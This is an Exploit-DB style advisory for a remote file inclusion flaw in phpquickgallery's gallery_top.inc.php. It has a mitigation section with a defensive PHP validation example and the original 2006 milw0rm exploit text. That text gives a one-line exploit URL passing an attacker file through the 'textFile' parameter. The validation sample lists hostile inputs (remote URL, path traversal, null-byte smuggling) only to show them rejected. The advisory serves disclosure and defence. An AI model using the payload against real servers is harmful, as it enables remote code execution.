Vendor: phpquickgallery
By: Al7ejaz Hacker
CVSS: 7.5 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: phpquickgallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PhpQuickGallery Remote File Include

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'textFile' parameter to the 'gallery_top.inc.php' script. A remote attacker can include and execute arbitrary local files, cause a denial of service or compromise a vulnerable system.

Mitigation:

The 'textFile' parameter should be validated before the script uses it, so that user-supplied input cannot lead to the execution of malicious code.
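
One way to apply the input validation recommended above, as an added example that is not phpquickgallery's code. It assumes `gallery_top.inc.php` uses `textFile` to choose a file that it then loads; `resolve_text_file()` and the temporary caption directory are hypothetical.

```php
<?php
// Added example, not phpquickgallery's code. Assumption: the script uses the
// 'textFile' request parameter to choose a file it then loads.
// resolve_text_file() and the caption directory are hypothetical names.

function resolve_text_file($requested, string $baseDir): ?string
{
    // Arrays (?textFile[]=x) and other non-strings are rejected outright.
    if (!is_string($requested)) {
        return null;
    }
    // Bare file name only: no URL scheme, no slash, no "..", no NUL byte.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    // After symlink resolution the file must still sit inside $base.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo data: one legitimate caption file in a temporary directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'captions_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'summer.txt', "Summer 2006\n");

// Constructed sample values for 'textFile'; only the first is accepted.
$samples = ['summer.txt', 'Attacker', 'http://example.invalid/x.txt',
            '../summer.txt', "summer.txt\0.php", ['summer.txt']];
foreach ($samples as $value) {
    $path = resolve_text_file($value, $dir);
    printf("%-34s %s\n", json_encode($value, JSON_UNESCAPED_SLASHES),
           $path === null ? 'rejected' : 'accepted');
}

// An accepted path is read and escaped as data, never passed to include():
echo htmlspecialchars(file_get_contents(
    resolve_text_file('summer.txt', $dir)), ENT_QUOTES, 'UTF-8');

unlink($dir . DIRECTORY_SEPARATOR . 'summer.txt');
rmdir($dir);
```

Independently of this check, PHP's `allow_url_include` setting should stay `Off` so that `include` cannot fetch remote URLs.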

Exploit-DB raw data:

============================================================================
+                                                                          =
+                     PhpQuickGallery  Remote File Include
+                                                                          =
+
+===========================================================================
+
+
+
+Script: phpquickgallery
+
+Risk : Dangerous
+
+Type: Remote File Include
+
+File Infected : gallery_top.inc.php
+
+Credit By: Al7ejaz Hacker
+
+E-mail: saudi@hotmail.fr
+============================================================================
+
+
++++++++++++
+Exploit : +
++++++++++++
+
+http://localhost/phpquickgallery/gallery_top.inc.php?textFile=Attacker
+
+
+
+Discovered By Al7ejaz Hacker
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2006-11-19]